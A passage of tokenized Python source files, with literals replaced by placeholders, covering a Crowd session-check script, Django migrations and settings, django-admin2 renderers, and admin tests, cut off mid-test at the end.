<s> import crowd <EOL> import os , sys , getpass <EOL> app_url = '<STR_LIT>' <EOL> app_user = '<STR_LIT>' <EOL> app_pass = '<STR_LIT>' <EOL> cs = crowd . CrowdServer ( app_url , app_user , app_pass ) <EOL> if len ( sys . argv ) > <NUM_LIT:1> : <EOL> username = sys . argv [ <NUM_LIT:1> ] <EOL> else : <EOL> username = os . environ [ '<STR_LIT>' ] <EOL> password = getpass . getpass ( prompt = '<STR_LIT>' % username ) <EOL> session = cs . get_session ( username , password ) <EOL> if session : <EOL> print '<STR_LIT>' % session [ '<STR_LIT>' ] <EOL> else : <EOL> print '<STR_LIT>' <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> success = cs . validate_session ( session [ '<STR_LIT>' ] ) <EOL> if success : <EOL> print '<STR_LIT>' <EOL> else : <EOL> print '<STR_LIT>' </s>
<s> from test_plus . test import TestCase <EOL> class TestUser ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . user = self . make_user ( ) <EOL> def test__str__ ( self ) : <EOL> self . assertEqual ( <EOL> self . user . __str__ ( ) , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_get_absolute_url ( self ) : <EOL> self . assertEqual ( <EOL> self . user . get_absolute_url ( ) , <EOL> '<STR_LIT>' <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> from django . conf import settings <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> migrations . swappable_dependency ( settings . AUTH_USER_MODEL ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . TextField ( blank = True , null = True ) , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( related_name = '<STR_LIT>' , blank = True , null = True , to = settings . AUTH_USER_MODEL ) , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT:status>' , <EOL> field = models . IntegerField ( default = <NUM_LIT:10> , choices = [ ( <NUM_LIT:10> , '<STR_LIT>' ) , ( <NUM_LIT:20> , '<STR_LIT>' ) , ( <NUM_LIT:30> , '<STR_LIT>' ) , ( <NUM_LIT> , '<STR_LIT>' ) ] ) , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( related_name = '<STR_LIT>' , blank = True , null = True , to = settings . AUTH_USER_MODEL ) , <EOL> ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> import jsonfield . fields <EOL> import django . utils . timezone <EOL> from django . conf import settings <EOL> import model_utils . fields <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> migrations . swappable_dependency ( settings . AUTH_USER_MODEL ) , <EOL> ] <EOL> operations = [ <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoCreatedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoLastModifiedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( unique = True , max_length = <NUM_LIT:50> ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:4> , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:50> , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( null = True , max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( null = True , max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT:description>' , models . TextField ( blank = True ) ) , <EOL> ( '<STR_LIT>' , models . NullBooleanField ( ) ) , <EOL> ( '<STR_LIT>' , models . NullBooleanField ( ) ) , <EOL> ( '<STR_LIT>' , models . NullBooleanField ( ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( null = True , max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = False ) ) , <EOL> ( '<STR_LIT>' , models . 
DateTimeField ( null = True , blank = True ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoCreatedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoLastModifiedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:100> ) ) , <EOL> ( '<STR_LIT>' , models . IntegerField ( ) ) , <EOL> ( '<STR_LIT:start>' , models . DateTimeField ( ) ) , <EOL> ( '<STR_LIT:status>' , models . CharField ( max_length = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = False ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( null = True ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( null = True ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . 
AutoCreatedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoLastModifiedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( unique = True , max_length = <NUM_LIT:50> ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:200> , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:4> , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:50> , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( null = True , editable = False ) ) , <EOL> ( '<STR_LIT:user>' , models . OneToOneField ( null = True , to = settings . AUTH_USER_MODEL ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoCreatedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoLastModifiedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( unique = True , max_length = <NUM_LIT:50> ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = False ) ) , <EOL> ( '<STR_LIT>' , jsonfield . fields . JSONField ( default = dict ) ) , <EOL> ( '<STR_LIT>' , jsonfield . fields . JSONField ( null = True ) ) , <EOL> ( '<STR_LIT>' , models . NullBooleanField ( ) ) , <EOL> ( '<STR_LIT>' , models . 
BooleanField ( default = False ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( to = '<STR_LIT>' , null = True ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoCreatedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoLastModifiedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT:data>' , models . TextField ( ) ) , <EOL> ( '<STR_LIT:message>' , models . CharField ( max_length = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , models . TextField ( ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( to = '<STR_LIT>' , null = True ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoCreatedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoLastModifiedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:50> ) ) , <EOL> ( '<STR_LIT>' , models . NullBooleanField ( ) ) , <EOL> ( '<STR_LIT>' , models . PositiveIntegerField ( null = True ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = False ) ) , <EOL> ( '<STR_LIT>' , models . 
BooleanField ( default = False ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT:date>' , models . DateTimeField ( ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:50> , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( related_name = '<STR_LIT>' , to = '<STR_LIT>' ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoCreatedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoLastModifiedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:50> ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:10> ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = False ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:50> ) ) , <EOL> ( '<STR_LIT:description>' , models . CharField ( max_length = <NUM_LIT:200> , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . 
CharField ( max_length = <NUM_LIT:100> , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . IntegerField ( null = True ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( related_name = '<STR_LIT>' , to = '<STR_LIT>' ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoCreatedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoLastModifiedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( unique = True , max_length = <NUM_LIT:50> ) ) , <EOL> ( '<STR_LIT:name>' , models . CharField ( max_length = <NUM_LIT:100> ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:10> , choices = [ ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:10> , verbose_name = '<STR_LIT>' , choices = [ ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) ) , <EOL> ( '<STR_LIT>' , models . IntegerField ( default = <NUM_LIT:1> , null = True , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( verbose_name = '<STR_LIT>' , max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , models . IntegerField ( null = True ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . 
AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoCreatedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoLastModifiedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( unique = True , max_length = <NUM_LIT:50> ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT:status>' , models . CharField ( max_length = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT:date>' , models . DateTimeField ( ) ) , <EOL> ( '<STR_LIT:description>' , models . TextField ( null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . IntegerField ( ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , models . IntegerField ( ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , models . IntegerField ( ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , models . IntegerField ( ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , models . 
IntegerField ( ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( related_name = '<STR_LIT>' , to = '<STR_LIT>' ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoCreatedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoLastModifiedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , models . TextField ( null = True , blank = True ) ) , <EOL> ( '<STR_LIT:description>' , models . TextField ( null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( related_name = '<STR_LIT>' , to = '<STR_LIT>' ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . OneToOneField ( related_name = '<STR_LIT>' , null = True , to = '<STR_LIT>' ) , <EOL> preserve_default = True , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( related_name = '<STR_LIT>' , to = '<STR_LIT>' ) , <EOL> preserve_default = True , <EOL> ) , <EOL> migrations . 
AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( related_name = '<STR_LIT>' , to = '<STR_LIT>' , null = True ) , <EOL> preserve_default = True , <EOL> ) , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> import six <EOL> from django . contrib import admin <EOL> from django . test import TestCase <EOL> class TestAdminSite ( TestCase ) : <EOL> def test_search_fields ( self ) : <EOL> """<STR_LIT>""" <EOL> for model , model_admin in six . iteritems ( admin . site . _registry ) : <EOL> for search_field in getattr ( model_admin , '<STR_LIT>' , [ ] ) : <EOL> model_name = model_admin . model . __name__ <EOL> self . assertFalse ( search_field . startswith ( '<STR_LIT>' . format ( <EOL> table_name = model_name . lower ( ) ) ) , <EOL> '<STR_LIT>' . format ( <EOL> search_field = search_field , model_name = model_name ) ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> BASE_DIR = os . path . dirname ( os . path . dirname ( __file__ ) ) <EOL> SECRET_KEY = '<STR_LIT>' <EOL> DEBUG = True <EOL> TEMPLATE_DEBUG = True <EOL> ALLOWED_HOSTS = [ ] <EOL> INSTALLED_APPS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> MIDDLEWARE_CLASSES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> WSGI_APPLICATION = '<STR_LIT>' <EOL> DATABASES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : os . path . join ( BASE_DIR , '<STR_LIT>' ) , <EOL> } <EOL> } <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> TIME_ZONE = '<STR_LIT>' <EOL> USE_I18N = True <EOL> USE_L10N = True <EOL> USE_TZ = True <EOL> STATIC_URL = '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , absolute_import , unicode_literals <EOL> import os . path <EOL> from datetime import date , time , datetime <EOL> from django . db import models <EOL> from django . utils import formats , timezone <EOL> from django . utils . encoding import force_text <EOL> from django . template . loader import render_to_string <EOL> from djadmin2 import settings <EOL> def boolean_renderer ( value , field ) : <EOL> """<STR_LIT>""" <EOL> tpl = os . path . join ( settings . ADMIN2_THEME_DIRECTORY , '<STR_LIT>' ) <EOL> return render_to_string ( tpl , { '<STR_LIT:value>' : value } ) <EOL> def datetime_renderer ( value , field ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( value , datetime ) : <EOL> return formats . localize ( timezone . template_localtime ( value ) ) <EOL> elif isinstance ( value , ( date , time ) ) : <EOL> return "<STR_LIT::>" . join ( ( formats . localize ( value ) ) . split ( "<STR_LIT::>" ) [ : <NUM_LIT:2> ] ) <EOL> else : <EOL> return "<STR_LIT::>" . join ( value . split ( "<STR_LIT::>" ) [ : <NUM_LIT:2> ] ) <EOL> def title_renderer ( value , field ) : <EOL> """<STR_LIT>""" <EOL> return force_text ( value ) . title ( ) <EOL> def number_renderer ( value , field ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( field , models . DecimalField ) : <EOL> return formats . number_format ( value , field . decimal_places ) <EOL> return formats . number_format ( value ) </s>
<s> from __future__ import unicode_literals <EOL> from datetime import datetime <EOL> from django . contrib . auth import get_user_model <EOL> from django . contrib . auth . models import Group <EOL> from django . core . urlresolvers import reverse <EOL> from django . test import TestCase , Client <EOL> from django . utils . encoding import force_text <EOL> from . . models import Post , Comment <EOL> class BaseIntegrationTest ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . client = Client ( ) <EOL> self . user = get_user_model ( ) ( username = '<STR_LIT:user>' , is_staff = True , <EOL> is_superuser = True ) <EOL> self . user . set_password ( "<STR_LIT:password>" ) <EOL> self . user . save ( ) <EOL> self . client . login ( username = '<STR_LIT:user>' , password = '<STR_LIT:password>' ) <EOL> class AdminIndexTest ( BaseIntegrationTest ) : <EOL> def test_view_ok ( self ) : <EOL> response = self . client . get ( reverse ( "<STR_LIT>" ) ) <EOL> self . assertContains ( response , reverse ( "<STR_LIT>" ) ) <EOL> class UserListTest ( BaseIntegrationTest ) : <EOL> def test_search_users_m2m_group ( self ) : <EOL> group = Group . objects . create ( name = "<STR_LIT>" ) <EOL> self . user . groups . add ( group ) <EOL> params = { "<STR_LIT:q>" : "<STR_LIT>" } <EOL> response = self . client . get ( reverse ( "<STR_LIT>" ) , params ) <EOL> self . assertContains ( response , '<STR_LIT:user>' ) <EOL> class CommentListTest ( BaseIntegrationTest ) : <EOL> def test_search_comments ( self ) : <EOL> post_1 = Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> post_2 = Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT>" ) <EOL> Comment . objects . create ( body = "<STR_LIT>" , post = post_1 ) <EOL> Comment . objects . create ( body = "<STR_LIT>" , post = post_1 ) <EOL> Comment . objects . create ( body = "<STR_LIT>" , post = post_2 ) <EOL> params = { "<STR_LIT:q>" : "<STR_LIT>" } <EOL> response = self . client . 
get ( <EOL> reverse ( "<STR_LIT>" ) , params ) <EOL> self . assertContains ( response , "<STR_LIT>" ) <EOL> self . assertContains ( response , "<STR_LIT>" ) <EOL> self . assertNotContains ( response , "<STR_LIT>" ) <EOL> def test_list_selected_hides ( self ) : <EOL> post_1 = Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> Comment . objects . create ( body = "<STR_LIT>" , post = post_1 ) <EOL> response = self . client . get ( reverse ( "<STR_LIT>" ) ) <EOL> self . assertNotContains ( response , "<STR_LIT>" ) <EOL> class PostListTest ( BaseIntegrationTest ) : <EOL> def _create_posts ( self ) : <EOL> Post . objects . bulk_create ( [ <EOL> Post ( <EOL> title = "<STR_LIT>" , <EOL> body = "<STR_LIT:body>" , <EOL> published_date = datetime ( <EOL> month = <NUM_LIT:7> , <EOL> day = <NUM_LIT> , <EOL> year = <NUM_LIT> <EOL> ) <EOL> ) , <EOL> Post ( <EOL> title = "<STR_LIT>" , <EOL> body = "<STR_LIT:body>" , <EOL> published_date = datetime ( <EOL> month = <NUM_LIT:5> , <EOL> day = <NUM_LIT:20> , <EOL> year = <NUM_LIT> , <EOL> ) <EOL> ) , <EOL> Post ( <EOL> title = "<STR_LIT>" , <EOL> body = "<STR_LIT:body>" , <EOL> published_date = datetime ( <EOL> month = <NUM_LIT:5> , <EOL> day = <NUM_LIT:30> , <EOL> year = <NUM_LIT> , <EOL> ) , <EOL> ) , <EOL> Post ( <EOL> title = "<STR_LIT>" , <EOL> body = "<STR_LIT:body>" , <EOL> published_date = datetime ( <EOL> month = <NUM_LIT:6> , <EOL> day = <NUM_LIT:20> , <EOL> year = <NUM_LIT> , <EOL> ) <EOL> ) , <EOL> Post ( <EOL> title = "<STR_LIT>" , <EOL> body = "<STR_LIT:body>" , <EOL> published_date = datetime ( <EOL> month = <NUM_LIT:6> , <EOL> day = <NUM_LIT:20> , <EOL> year = <NUM_LIT> , <EOL> ) <EOL> ) , <EOL> ] ) <EOL> def test_view_ok ( self ) : <EOL> post = Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> response = self . client . get ( reverse ( "<STR_LIT>" ) ) <EOL> self . assertContains ( response , post . 
title ) <EOL> def test_list_filter_presence ( self ) : <EOL> Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT>" ) <EOL> response = self . client . get ( reverse ( "<STR_LIT>" ) ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> def test_list_selected_shows ( self ) : <EOL> Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> response = self . client . get ( reverse ( "<STR_LIT>" ) ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> def test_actions_displayed ( self ) : <EOL> response = self . client . get ( reverse ( "<STR_LIT>" ) ) <EOL> self . assertInHTML ( <EOL> '<STR_LIT>' , force_text ( response . content ) ) <EOL> def test_actions_displayed_twice ( self ) : <EOL> response = self . client . get ( reverse ( "<STR_LIT>" ) ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> def test_delete_selected_post ( self ) : <EOL> post = Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> params = { '<STR_LIT:action>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( post . pk ) } <EOL> response = self . client . post ( reverse ( "<STR_LIT>" ) , params ) <EOL> self . assertInHTML ( <EOL> '<STR_LIT>' , force_text ( response . content ) ) <EOL> def test_delete_selected_post_confirmation ( self ) : <EOL> post = Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> params = { '<STR_LIT:action>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( post . pk ) , '<STR_LIT>' : '<STR_LIT:yes>' } <EOL> response = self . client . post ( reverse ( "<STR_LIT>" ) , params ) <EOL> self . assertRedirects ( response , reverse ( "<STR_LIT>" ) ) <EOL> def test_delete_selected_post_none_selected ( self ) : <EOL> Post . objects . 
